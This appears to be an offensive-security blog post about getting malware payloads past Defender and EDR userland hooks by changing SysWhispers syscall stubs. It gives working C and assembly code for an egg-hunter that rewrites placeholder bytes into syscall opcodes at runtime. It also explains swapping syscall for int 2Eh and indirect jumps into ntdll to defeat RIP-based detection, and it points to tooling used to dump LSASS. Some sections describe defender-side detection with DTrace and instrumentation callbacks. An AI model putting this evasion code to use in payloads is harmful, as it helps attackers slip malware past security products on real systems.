SysWhispers is dead, long live SysWhispers!

TL;DR

As already explained in my previous post “The path to code execution in the era of EDR, Next-Gen AVs, and AMSI”, various security products, such as AVs and EDRs, place hooks in user-mode API functions to analyse the execution flow of a specific API in order to detect potentially malicious activities. Naturally, any Red Team Member will always need to find a way to address this “issue”, and execute specific code on a target environment without being flagged.

If you are not familiar with API hooking, you can check this link for a very good overview, or this link for a presentation on the topic.

Main Methods to bypass userland-hooking

There are a few well-known methods to bypass these userland hooks, such as:

Syscalls’ stub reimplementation + Dynamic SSN resolution (CREDITS: Cn33liz)
Hell’s Gate (CREDITS: am0nsec & RtlMateusz)
- Evolution 1: Halo’s Gate (CREDITS: Sektor7)
- Evolution 2: Tartarus’ Gate (CREDITS: Thanasis)
Manual/Overload Mapping (?)
Full/partial Unhooking (?)

*These are all awesome techniques, and I would really like to thank the original “inventors”. I’m just not sure who to credit for some of them, so if anyone knows, please get in touch.

Although all these techniques are currently adopted and sometimes combined to develop offensive tradecraft, I would like to focus the attention on one of the above techniques: “Syscalls’ stub reimplementation + Dynamic SSN resolution”. This technique, popularized by Cn33liz, was later implemented by Jackson_T in a popular tool for malware development: SysWhispers2.

“SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe). The headers will also include the necessary type definitions.”

Practically, thanks to SysWhispers, offensive developers could easily generate ASM stubs for specific system calls (Syscall Stub Reimplementation) and call the associated system call by retrieving the right SSN at runtime (via SSN EAT ordering).
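To make the “ordering” idea concrete, here is a minimal sketch on made-up data. It assumes the scheme works by sorting the Zw* exports by address and treating each entry’s position in the sorted list as its SSN; the `export_entry` type, the hash values and the `ssn_for_hash` helper are hypothetical names used only for illustration, not SysWhispers code.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical record for one Zw* export taken from the EAT. */
typedef struct {
    uint32_t hash;  /* made-up hash of the export name */
    uint32_t rva;   /* RVA of the export inside the DLL */
} export_entry;

/* qsort comparator: ascending by RVA. */
static int by_rva(const void *a, const void *b)
{
    uint32_t ra = ((const export_entry *)a)->rva;
    uint32_t rb = ((const export_entry *)b)->rva;
    return (ra > rb) - (ra < rb);
}

/*
 * Sorts the entries by address and returns the position of `hash` in the
 * sorted list, which this sketch treats as the SSN. Returns -1 when the
 * hash is not in the list.
 */
int ssn_for_hash(export_entry *entries, size_t count, uint32_t hash)
{
    assert(entries != NULL);
    qsort(entries, count, sizeof entries[0], by_rva);
    for (size_t i = 0; i < count; i++) {
        if (entries[i].hash == hash)
            return (int)i;
    }
    return -1;
}
```

The point of the design is that nothing has to be read from the stub itself, so a hook that overwrites the stub bytes does not affect the result.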

Needless to say, this tool is probably one of the most useful I have worked with. So useful that I used it to implement the native system call module of my malware development framework, Inceptor.

Offence is the best Defence

I genuinely think that continuing to improve offensive tooling and adversary emulation/simulation techniques is by far the best way to improve the defensive side as well.

Offensive tooling is constantly affected by this continuous evolution. A huge part of “defensive research” is all about developing or enhancing detection strategies for malware, tools (like C2 frameworks), and libraries (like D/Invoke).

Of course, SysWhispers was also affected by this process. When it was first released, the tool went mostly unnoticed by defensive security tools. However, with time, its usage has started to be detected by some security solutions, both statically and dynamically. In the following paragraphs, we’ll analyse how, and whether we can do something about it.

The mark of the “syscall”

Playing around with Inceptor, one day I realised Defender had started detecting some payloads, even when generated with non-public templates. I was puzzled for a bit, not least because ThreatCheck/DefenderCheck was not able to identify any bad bytes.

C:\inceptor> libs\public\ThreatCheck.exe -f artifacts\test.exe
[+] Target file size: 40488 bytes
[+] Analyzing...
[x] File is malicious, but couldn't identify bad bytes

I soon noticed, however, that the same payload was not identified as malicious by Defender when the syscalls module was not used.

As SysWhispers mainly includes the assembly instructions for the syscalls’ stubs, it was apparent to me that the detection should be based on something related to the stubs. After a while, I realised it was actually the syscall instruction. Thinking about it, it made sense, because there is no valid reason a syscall should be executed directly by an executable. Naturally, when a program needs to execute a System Call, it does that by using an exposed API, so the syscall instruction should be present, by logic, only in ntdll.dll.

To give you a visual representation, by dumping a payload generated by inceptor with -m syscalls, it is indeed possible to notice a bunch of syscall instructions.

Syscall Mark

Bypass the static mark

What now? At the time, I already knew that it was possible to use another instruction to execute a System Call, but let’s proceed step-by-step.

Finding an alternative

By observing the stub of any system service call in ntdll.dll, it’s possible to notice a specific pattern:

Syscall Stub Pattern

If we rebuild the ASM code for this System Call, we could write something similar to this:

__syscall_stub:
  mov r10, rcx
  mov eax, <SSN>
  test byte ptr [SharedUserData+0x308], 1
  jne __syscall_not_enabled
  syscall
  ret
  
__syscall_not_enabled:
  int 2eh
  ret

There’s not much to explain, but let’s do it to ensure we are all on the same page.

mov r10, rcx
mov eax, <SSN>

The first two instructions copy rcx into r10 and load the correct System Service Number into eax. The copy is needed because the syscall instruction overwrites rcx with the address of the first instruction to be executed back in userland, so the first argument has to travel in r10 instead. The value in eax is used to invoke the right system call.

test byte ptr [SharedUserData+0x308], 1
jne __syscall_not_enabled

Now the interesting part: the function checks whether the low bit of SharedUserData[0x308] is set. SharedUserData is a symbol referring to the Kernel mode structure KUSER_SHARED_DATA.

The KUSER_SHARED_DATA structure defines a fixed (or pre-defined) memory space used to share information with user-mode software. This, of course, was done for making certain global system information ready to be consumed by user-land code without the overhead to switch every time between user and kernel-mode execution.

The value at offset 0x308 is the SystemCall field, which is present in all Windows 10 versions from 1511 onwards and tells the stub which instruction to use. The alternative to syscall is the legacy, interrupt-based way of entering the kernel: int 2Eh.

Offset	Definition	Versions
0x308	ULONG SystemCall;	1511 and higher

Geoff Chappell - KUSER_SHARED_DATA

If you’re asking yourself why this int 2Eh is still there, even if Windows is now far above version 1511, it’s because this instruction is still used. Indeed, when HVCI (Hypervisor-protected Code Integrity) is enabled, the low bit of SharedUserData[0x308] is set, the jne branch is taken, and int 2Eh is used instead of the syscall instruction. This is mostly done for performance reasons, due to how the Ring3 to Ring0 switch is operated using one or the other instruction.
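The decision made by the test/jne pair in the stub can be modelled in a few lines of C. This is only a sketch that works on a caller-supplied buffer standing in for KUSER_SHARED_DATA, not a read of the real structure; `SYSTEMCALL_OFFSET` and `stub_uses_int2e` are names I made up for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Offset of the SystemCall field inside KUSER_SHARED_DATA. */
#define SYSTEMCALL_OFFSET 0x308

/*
 * Hypothetical helper mirroring `test byte ptr [SharedUserData+0x308], 1`
 * followed by `jne`. Returns 1 when the stub would branch to `int 2Eh`,
 * 0 when it would fall through to `syscall`.
 * `shared` is a copy of the structure provided by the caller.
 */
int stub_uses_int2e(const unsigned char *shared, size_t shared_len)
{
    assert(shared != NULL);
    if (shared_len <= SYSTEMCALL_OFFSET)
        return 0; /* field not covered by the buffer: assume `syscall` */
    return (shared[SYSTEMCALL_OFFSET] & 1) != 0;
}
```

Only the low bit matters here, exactly as in the stub, where the `test` instruction masks the byte with 1.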

So, what does this tell us? Well, in a nutshell, that we can easily replace every syscall occurrence with an int 2Eh, and the code should run exactly the same.

As I’ve suggested at the beginning, I already knew about the int 2Eh instruction, but I thought it was interesting to show that this instruction could be recovered easily regardless.

Is this really enough?

Honestly, I supposed Defender had also implemented a signature for this instruction. It would make sense, because I don’t know of any legitimate use of this instruction in a user-mode application. But Defender didn’t implement that signature (not at the time, at least). So just this little modification was enough to bypass Defender again:

Syscall replaced by int 2Eh

The journey to bypass the newly introduced signature was not long. Honestly, I was a bit disappointed at this point, because I was expecting something more from Defender this time.

Before I finished this article, I found the same story written by a fellow researcher, Capt. Meelo. Here is his blog post: “When You sysWhisper Loud Enough for AV to Hear You”.

A new journey begins

Even if this journey was quite short, it was just the start of a longer one, which becomes useful should Defender get smart enough to also hunt for int 2Eh (opcodes: cd 2e).

Note: The techniques presented in the rest of the blog post are integrated into inceptor (sponsored).

A better alternative to int 2Eh - Egg Hunting

As already noticed by Capt. Meelo, replacing the syscall instruction with int 2Eh can lead to other issues. On one hand it’s very easy to use, but on the other it’s easy to signature, easy to hunt, and it also might not work as expected.

So what could be a better path to follow? Well, there are multiple choices, for sure. One technique might be placing specific placeholders instead of our syscall instructions, and change them at runtime. We can implement this in the form of an egg-hunter. To understand how this might work, it is necessary to understand first what an egg-hunter is, and how we can adapt it to our use case.

Generally, an egg-hunter is the first stage of a multistage payload. It is usually nothing more than a piece of code that locates specific patterns in memory by scanning it sequentially. The pattern is just an arbitrary sequence of bytes, and it’s historically called “egg”. To avoid errors, the egg is usually inserted “doubled”. The most iconic egg ever used is probably “w00t”, which gives the pattern “w00tw00t” to search.
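The search itself is nothing more than a sequential scan. Below is a minimal sketch that works on a plain byte buffer rather than on process memory; `find_egg` is a hypothetical helper written for this post, not part of any tool mentioned here.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: scans `buf` sequentially for the first occurrence
 * of `egg` and returns its offset, or -1 when the egg is not present.
 */
long find_egg(const unsigned char *buf, size_t buf_len,
              const unsigned char *egg, size_t egg_len)
{
    assert(buf != NULL && egg != NULL && egg_len > 0);
    /* `off + egg_len <= buf_len` keeps every comparison inside the buffer. */
    for (size_t off = 0; off + egg_len <= buf_len; off++) {
        if (memcmp(buf + off, egg, egg_len) == 0)
            return (long)off;
    }
    return -1;
}
```

Searching for the doubled pattern (8 bytes instead of 4) is what keeps a stray “w00t” elsewhere in the buffer from being reported as a match.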

In assembly, when we want to insert a series of bytes in memory, we can use the “DB” trick. DB is an assembler directive used to “define a byte”. So, if we want to insert the sequence “w00t” in memory (here with NUL bytes standing in for the two zeros), we can do it like:

DB 77h ; 'w'
DB 0h  ; '0' (stored as a NUL byte)
DB 0h  ; '0' (stored as a NUL byte)
DB 74h ; 't'

Using this trick, we can place a sequence of known-bytes (egg) as a placeholder for the syscall instruction, and replace it at runtime. Integrated into SysWhispers, that will give the pattern below. For simplicity, only one NtApi (NtAllocateVirtualMemory) is shown.

NtAllocateVirtualMemory PROC
  mov [rsp +8], rcx          ; Save registers.
  mov [rsp+16], rdx
  mov [rsp+24], r8
  mov [rsp+32], r9
  sub rsp, 28h
  mov ecx, 003970B07h        ; Load function hash into ECX.
  call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
  add rsp, 28h
  mov rcx, [rsp +8]          ; Restore registers.
  mov rdx, [rsp+16]
  mov r8, [rsp+24]
  mov r9, [rsp+32]
  mov r10, rcx
  DB 77h                     ; "w"
  DB 0h                      ; "0"
  DB 0h                      ; "0"
  DB 74h                     ; "t"
  DB 77h                     ; "w"
  DB 0h                      ; "0"
  DB 0h                      ; "0"
  DB 74h                     ; "t"
  ret
NtAllocateVirtualMemory ENDP

Using the stub above in a real program would naturally result in a crash and exit, as the function does practically nothing other than setting up the registers for a system call and returning.

SysWhispering too low

In order to be usable, we need to modify the “w00tw00t” in memory with the necessary opcodes, in this case 0f 05 c3 90 90 90 90 90 (or similar), which translates to syscall; ret; nop; nop; nop; nop; nop;.

This can be done in a variety of ways. A sample code to achieve this is provided below:

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <psapi.h>

#define DEBUG 0

HMODULE GetMainModule(HANDLE);
BOOL GetMainModuleInformation(PULONG64, PULONG64);
void FindAndReplace(unsigned char[], unsigned char[]);

HMODULE GetMainModule(HANDLE hProcess)
{
    HMODULE mainModule = NULL;
    HMODULE* lphModule;
    LPBYTE lphModuleBytes;
    DWORD lpcbNeeded;

    // First call needed to know the space (bytes) required to store the modules' handles
    BOOL success = EnumProcessModules(hProcess, NULL, 0, &lpcbNeeded);

    // We already know that lpcbNeeded is always > 0
    if (!success || lpcbNeeded == 0)
    {
        printf("[-] Error enumerating process modules\n");
        // At this point, we already know we won't be able to dynamically
        // place the syscall instruction, so we can exit
        exit(1);
    }
    // Once we got the number of bytes required to store all the handles for
    // the process' modules, we can allocate space for them
    lphModuleBytes = (LPBYTE)LocalAlloc(LPTR, lpcbNeeded);

    if (lphModuleBytes == NULL)
    {
        printf("[-] Error allocating memory to store process modules handles\n");
        exit(1);
    }
    unsigned int moduleCount;

    moduleCount = lpcbNeeded / sizeof(HMODULE);
    lphModule = (HMODULE*)lphModuleBytes;

    success = EnumProcessModules(hProcess, lphModule, lpcbNeeded, &lpcbNeeded);

    if (!success)
    {
        printf("[-] Error enumerating process modules\n");
        exit(1);
    }

    // Finally storing the main module
    mainModule = lphModule[0];

    // Avoid memory leak
    LocalFree(lphModuleBytes);

    // Return main module
    return mainModule;
}

BOOL GetMainModuleInformation(PULONG64 startAddress, PULONG64 length)
{
    HANDLE hProcess = GetCurrentProcess();
    HMODULE hModule = GetMainModule(hProcess);
    MODULEINFO mi;

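    if (!GetModuleInformation(hProcess, hModule, &mi, sizeof(mi)))
    {
        printf("[-] Error retrieving main module information\n");
        return FALSE;
    }

    // %llx prints the addresses in hexadecimal, matching the 0x prefix
    printf("Base Address: 0x%llx\n", (ULONG64)mi.lpBaseOfDll);
    printf("Image Size:   %lu\n", (ULONG)mi.SizeOfImage);
    printf("Entry Point:  0x%llx\n", (ULONG64)mi.EntryPoint);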
    printf("\n");

    *startAddress = (ULONG64)mi.lpBaseOfDll;
    *length = (ULONG64)mi.SizeOfImage;

    DWORD oldProtect;
    VirtualProtect(mi.lpBaseOfDll, mi.SizeOfImage, PAGE_EXECUTE_READWRITE, &oldProtect);

    return TRUE;
}

void FindAndReplace(unsigned char egg[], unsigned char replace[])
{

    ULONG64 startAddress = 0;
    ULONG64 size = 0;

    GetMainModuleInformation(&startAddress, &size);

    if (size == 0) {
        printf("[-] Error detecting main module size\n");
        exit(1);
    }

    ULONG64 currentOffset = 0;

    // Scratch buffer for the 8 bytes read at each offset
    unsigned char* current = (unsigned char*)malloc(8 * sizeof(unsigned char));
    size_t nBytesRead;

    printf("Starting search from: 0x%llx\n", (ULONG64)startAddress + currentOffset);

    while (currentOffset < size - 8)
    {
        currentOffset++;
        LPVOID currentAddress = (LPVOID)(startAddress + currentOffset);
        if(DEBUG > 0){
            printf("Searching at 0x%llx\n", (ULONG64)currentAddress);
        }
        if (!ReadProcessMemory(GetCurrentProcess(), currentAddress, current, 8, &nBytesRead)) {
            printf("[-] Error reading from memory\n");
            exit(1);
        }
        if (nBytesRead != 8) {
            printf("[-] Error reading from memory\n");
            continue;
        }

        if(DEBUG > 0){
            for (int i = 0; i < nBytesRead; i++){
                printf("%02x ", current[i]);
            }
            printf("\n");
        }

        if (memcmp(egg, current, 8) == 0)
        {
            printf("Found at 0x%llx\n", (ULONG64)currentAddress);
            WriteProcessMemory(GetCurrentProcess(), currentAddress, replace, 8, &nBytesRead);
        }

    }
    printf("Ended search at:   0x%llx\n", (ULONG64)startAddress + currentOffset);
    free(current);
}

Within an inceptor template, then, we can simply do something like this:

int main(int argc, char** argv) {

    unsigned char egg[] = { 0x77, 0x00, 0x00, 0x74, 0x77, 0x00, 0x00, 0x74 }; // w00tw00t
    unsigned char replace[] = { 0x0f, 0x05, 0x90, 0x90, 0xC3, 0x90, 0xCC, 0xCC }; // syscall; nop; nop; ret; nop; int3; int3

    //####SELF_TAMPERING####
    (egg, replace);

    Inject();
    return 0;
}

The //####SELF_TAMPERING#### placeholder will be replaced by the randomly-named function FindAndReplace. We can compile it using the following command line:

python inceptor.py native tests\note.raw -o artifacts\note.exe -m syscalls -m self_tampering

If this is compiled with Inceptor, we can notice how the eggs are detected by our egg-hunter and replaced with the correct instructions, successfully executing the code.

SysWhispering the egg

Here’s the detail of the spotted instructions:

Egg-hunter detail

Detected again! The RIP curse

This technique is not as easy to detect as replacing syscall with int 2Eh but, of course, it can still be detected by a careful hunter. How?

Thanks to my friend and researcher Olaf Hartong, I’ve realised that defenders are not just looking for System Calls to happen, but they also focus on WHERE a specific syscall instruction was executed. In this context, the main issue with using System Call stubs re-implementation, is that a System Call originates from a module in memory which is not ntdll.dll.

Indeed, if the system call was made legitimately, the return address (from the kernel) should be in ntdll, while if it was crafted within the binary itself, the kernel returns to an address within the main image of the program which executes it.

Let’s make it clear with a diagram. When a System Call is made through an API, the flow looks like the following:

Normal API Flow

As observable, when the execution returns from kernel to user mode code, the RIP (the instruction pointer) is in ntdll. As we’ve seen, after the syscall instruction, usually there is a ret, which returns the execution back to the caller.

However, when a function is crafted as in SysWhispers, the syscall instruction is executed directly within the main module of the program, and the flow appears like the following:

Crafted Syscall Flow

As such, detecting maliciously crafted system calls could be easily done using a RIP sanity check. The question now is, can we intercept the execution whenever the kernel switches back to user mode? We can, by using a framework and some tricks shared by Alex Ionescu at REcon in 2015 and superbly presented in a talk titled Hooking Nirvana.

Nirvana is a lightweight, dynamic translation framework that can be used to monitor and control the (user mode) execution of a running process without needing to recompile or rebuild any code in that process. This is sometimes also referred to as program shepherding, sandboxing, emulation, or virtualization. Dynamic translation is a powerful complement to existing static analysis and instrumentation techniques. – Microsoft

Leveraging Nirvana, a security tool, or a hunter, can hook and monitor all kernel -> user mode callbacks.

More specifically, it is possible to leverage the KPROCESS!InstrumentationCallback field to execute a callback every time there is a kernel to user mode switch. The main idea is to save the RIP, and analyse it to see if, when the execution returns to user mode, it is within the ntdll address space.

While I was trying to implement this check, I found that it had already been implemented in this project. The project was released together with a nice article. It’s an incredibly good read.

Once compiled, we can add it to our project by simply loading the DLL using LoadLibrary:

int main(int argc, char** argv) {
    
    LoadLibraryA("C:\\syscall-detect.dll");  // ANSI variant, so the narrow string literal also works in Unicode builds
    
    unsigned char egg[] = { 0x77, 0x00, 0x00, 0x74, 0x77, 0x00, 0x00, 0x74 }; // w00tw00t
    unsigned char replace[] = { 0x0f, 0x05, 0x90, 0x90, 0xC3, 0x90, 0xCC, 0xCC }; // syscall; nop; nop; ret; nop; int3; int3

    //####SELF_TAMPERING####
    (egg, replace);

    Inject();
    return 0;
}

And… yes, it can spot us pretty easily:

Detected by syscall-detect

Bypassing the RIP check

We can again bypass this check with a nice technique, both simple and flexible, which consists in performing an indirect jump from our code to a syscall instruction inside ntdll.dll. I usually refer to this technique as “Jumper”.

However, if we want to implement something like that, we would need to dynamically resolve the address of the correct syscall instruction, for each System Call we want to use. After a skim read of the SysWhispers code, it was apparent I could easily implement the missing functionality.

Indeed, SysWhispers already maintained in memory a structure to associate System Service Numbers (SSN) and RVAs:

typedef struct _SW2_SYSCALL_ENTRY
{
    DWORD Hash;
    DWORD Address;
    // ---> ADDING A FIELD 
    // ULONG64 SyscallOffset;
} SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;

typedef struct _SW2_SYSCALL_LIST
{
    DWORD Count;
    SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
} SW2_SYSCALL_LIST, *PSW2_SYSCALL_LIST;

As such, we can easily add a ULONG64 field to store the absolute address of the syscall instruction. With that set, when the _SW2_SYSCALL_LIST is populated, we need a way to calculate the address of the syscall instruction. We can borrow the same logic as the Egg-Hunter implemented earlier, as the concept is the same. In this case though, we already have the ntdll.dll base address, and SysWhispers also calculates the function RVA from the DLL EAT (Export Address Table). As such, the only thing left to calculate is the relative position of the syscall instruction, and then do some maths.

A pseudo-code implementation could be:

function findOffset(HANDLE current_process, int64 start_address, int64 dllSize) -> int64:
  int64 offset = 0
  bytes signature = "\x0f\x05\xc3"  // syscall; ret
  bytes currentbytes = ""
  while currentbytes != signature:
    offset++
    if offset + 3 > dllSize:
      return INFINITE
    ReadProcessMemory(current_process, start_address + offset, &currentbytes, 3, nullptr)
  return start_address + offset  

I’m not sharing the full implementation, but at this point you have enough code to craft your own ;)

Once we have the address of the syscall instruction associated with the Nt/Zw function we need to call, we can just jump to it, using JMP <Syscall Address>.

In this response by S4ntiagoP, I was notified that nanodump utilises this technique to create the stubs to dump LSASS. If you’re interested in seeing an actual implementation, check it here.

“Freshy” System Calls

Before continuing, I would like to note that a similar technique was implemented by Elephantse4l in FreshyCalls.

However, this technique uses static offsets from the start of the system call stub to detect the syscall instruction, as you can see in the code below:

// Tries to locate the syscall instruction inside a stub using some known patterns. Returns
// the address of the instruction.

[[nodiscard]] static inline uintptr_t FindSyscallInstruction(uintptr_t stub_addr) noexcept {
  uintptr_t instruction_addr;

  // Since Windows 10 TH2
  if (*(reinterpret_cast<unsigned char *>(stub_addr + 0x12)) == 0x0F &&
      *(reinterpret_cast<unsigned char *>(stub_addr + 0x13)) == 0x05) {
    instruction_addr = stub_addr + 0x12;
  }

    // From Windows XP to Windows 10 TH2
  else if (*(reinterpret_cast<unsigned char *>(stub_addr + 0x8)) == 0x0F &&
      *(reinterpret_cast<unsigned char *>(stub_addr + 0x9)) == 0x05) {
    instruction_addr = stub_addr + 0x8;
  } else {
    instruction_addr = 0;
  }

  return instruction_addr;
};

This means that, if any userland hooks are placed between the start of the stub and the syscall instruction, the expected bytes may no longer sit at these offsets, and FreshyCalls would fail to find the instruction.

So what if there are any hooks installed?

As opposed to FreshyCalls implementation, our newly implemented jumper is less susceptible to hooks, as it dynamically searches for the syscall instruction, which must be there, in ntdll.dll. It indeed doesn’t use static offsets from the start of the syscall signature, which could be broken by inline hooks installed within the dll.

Demo

And below we can see how it is possible to bypass the RIP check using the indirect jump:

Bypass Syscall Detect

Additional considerations

In his blog, Elephantse4l assumed that, by jumping to syscall instruction inside ntdll, we somehow “leaked” the syscall we used.

In a response on Twitter, Elephantse4l explained to me that what this means is that the return address (back from kernel) can be correlated using ETW to identify the system call we used. This opens up interesting scenarios where we JMP to a syscall instruction in ntdll, but use the address of a syscall instruction from a different API than the one we are actually calling.

For example, if we are using NtAllocateVirtualMemory, we can perform an indirect jump to the address of the syscall instruction inside NtTestAlert, and so on.

However, regardless of how the system call is actually implemented (within the main program or via a jump to ntdll), it can still be detected by leveraging kernel tracing. Kernel tracing detects the system call by using the SSN value rather than the return address, and as such, it’s pretty difficult to trick.

A trivial example is offered by the following D script for DTrace:

syscall::NtAllocateVirtualMemory:entry 
/execname == $1 / 
{  
  MEM_COMMIT = 0x00001000;
  MEM_PHYSICAL = 0x00400000;
  MEM_RESERVE = 0x00002000;
  
  PAGE_EXECUTE_READWRITE = 0x40;

  /*
  arg3 is the RegionSize, which is a pointer to the variable that will contain the actual size of the allocated buffer
  of course, we are interested only in pointers in user land 		
  */
  if (arg3 > 0) 
  {	
    if ( (arg4 & MEM_COMMIT) && (arg4 & MEM_RESERVE) )
      if ( (arg5 & PAGE_EXECUTE_READWRITE) )
        printf(" Bytes reserved & commited %d ",  * (nt`PSIZE_T) copyin(arg3, sizeof (nt`PSIZE_T)));
  } 	
}

If executed via dtrace, as:

dtrace -s NtAllocateVirtualMemory.d test.exe

DTrace can easily see the syscall generated via an indirect JMP to ntdll using our modified SysWhispers.

SysWhispers Jumper Detected

But it can also easily see the syscall generated in the main program module using the normal SysWhispers.

SysWhispers Normal Detected

Stupid, but maybe effective

A stupidly simple way for an EDR to detect if a program is doing anything “suspicious” would be to count the number of system calls executed by it, and validate that number against the number of system calls executed by that program and successfully analysed by the EDR itself. If the numbers mismatch, the program is very likely to be hiding its behaviour.
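As a sketch of the idea, assume the EDR keeps two tallies per system call: one fed by a kernel-side source and one fed by its own user-mode hooks. Both tallies, and the `unhooked_calls` helper, are assumptions of mine for illustration; no specific product is known to work this way.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Hypothetical check: `kernel_seen[i]` is how many times system call i was
 * observed by a kernel-side source, `hook_seen[i]` how many times the
 * user-mode hook for the same call fired. Returns the number of calls that
 * reached the kernel without passing through a hook.
 */
unsigned long unhooked_calls(const unsigned long *kernel_seen,
                             const unsigned long *hook_seen, size_t n)
{
    unsigned long missing = 0;
    assert(kernel_seen != NULL && hook_seen != NULL);
    for (size_t i = 0; i < n; i++) {
        if (kernel_seen[i] > hook_seen[i])
            missing += kernel_seen[i] - hook_seen[i];
    }
    return missing;
}
```

Any non-zero result means some calls never went through the hooked path, which is exactly the mismatch described above.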

Conclusion

Although more appealing techniques for bypassing user-land hooks are becoming more prominent, like Hell’s Gate and, even more so, its evolutions (Halo’s and Tartarus’), I think the technique implemented in SysWhispers offers some advantages that are difficult to ignore for offensive development. The only requirement is a bit of creativity.
